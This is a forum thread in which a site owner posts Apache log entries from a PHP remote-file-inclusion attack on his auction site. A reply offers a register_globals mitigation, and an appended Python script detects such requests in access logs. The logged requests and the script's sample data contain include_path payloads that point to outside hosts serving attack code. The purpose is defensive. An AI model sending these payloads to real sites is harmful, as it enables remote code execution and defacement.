Posted by Jean Gaudreau on 10/16/07 13:28
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@charlescrumesoftware.com> wrote:
> Hello Everyone;
>
> My site was hacked the other day -- someone was able to rename my
> index.shtml file and put their own index.html file on my server. Not sure
> how it was done, but looking through the log file, I found lots and lots
> of entries where an "include_path" parameter was included in the URL of the
> PHP page, as shown below:
>
> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>
> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
> 404 310 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>
> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>
> I know how "include_path" works when *in* the PHP file, but I'm not sure
> what the effect of including it in the URL is. A number of entries show a code
> 404 as the culprits are obviously phishing for pages, but requests with
> return code 200 are showing a large number of bytes transferred -- far
> larger than the PHP page itself.
>
> Can someone explain what adding "include_path" to a URL does?
>
> Is there something I need to check on my server or how I've got Apache
> configured?
>
> TIA.
>
> Charles...
Hi,
I've also been the target of a hacker, with the same attack.
Add this to your script:
=====
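$php_self = $_SERVER['PHP_SELF'];
// Only act when this include file is requested directly and
// register_globals is turning request parameters into globals.
if (($php_self == "/auction/includes/settings.inc.php") &&
    (ini_get('register_globals'))) {
    $rg = array_keys($_REQUEST);
    foreach ($rg as $var)
    {
        // A global equal to the request value was set from the request.
        if ($_REQUEST[$var] === $$var)
        {
            unset($$var);
            exit;
        }
    }
}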
=======
This will check if they are running the file and, if register_globals is
enabled, catch the parameters, unset them, then halt the script.
So far it is working.
Jean
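
To find every request of the kind quoted above in an access log, here is an added example (not part of either post) that flags any query parameter whose value is a remote URL. It goes beyond the `include_path` case: it matches any parameter name, percent-encoded values, and parameters hidden behind a second `?` as in the `item.php?id=268/...` entries. The function name, addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache common/combined format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?)(?: HTTP/[\d.]+)?" (\d{3}) (\S+)')
# name=<remote URL> anywhere in the query string, including after a second "?"
REMOTE_RE = re.compile(r'([\w.\[\]]+)=((?:https?|ftps?)://[^\s&]+)', re.I)

def find_remote_includes(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        host, _method, target, status, size = m.groups()
        path, _, query = target.partition("?")
        # Decode twice so %3A%2F%2F and double-encoded values are also caught.
        decoded = unquote(unquote(query))
        for param, url in REMOTE_RE.findall(decoded):
            hits.append({"host": host, "path": path, "param": param,
                         "url": url, "status": int(status),
                         "bytes": 0 if size == "-" else int(size)})
    return hits

# Constructed sample lines (documentation addresses, made-up hostname).
SAMPLE = [
    '192.0.2.10 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268'
    '/includes/settings.inc.php?include_path=http://attacker.example/echo.txt? '
    'HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [11/Oct/2007:15:07:38 -0400] "GET /auction/includes/'
    'settings.inc.php?include_path=http://attacker.example/echo.txt? '
    'HTTP/1.1" 200 75 "-" "libwww-perl/5.65"',
    '198.51.100.7 - - [11/Oct/2007:15:45:42 -0400] "GET /index.php?include_path='
    'http%3A%2F%2Fattacker.example%2Fecho.txt%3F HTTP/1.1" 404 310 "-" "-"',
    '198.51.100.7 - - [11/Oct/2007:15:50:01 -0400] "GET /auction/item.php?id=268 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    # Status 200 means the script was reached, so those sort first for review.
    for h in sorted(find_remote_includes(SAMPLE), key=lambda h: h["status"]):
        print(h["status"], h["bytes"], h["host"], h["path"], h["param"], h["url"])
```

Legitimate parameters that carry a URL (a redirect target, for instance) will also match, so treat the output as a list to review rather than a verdict.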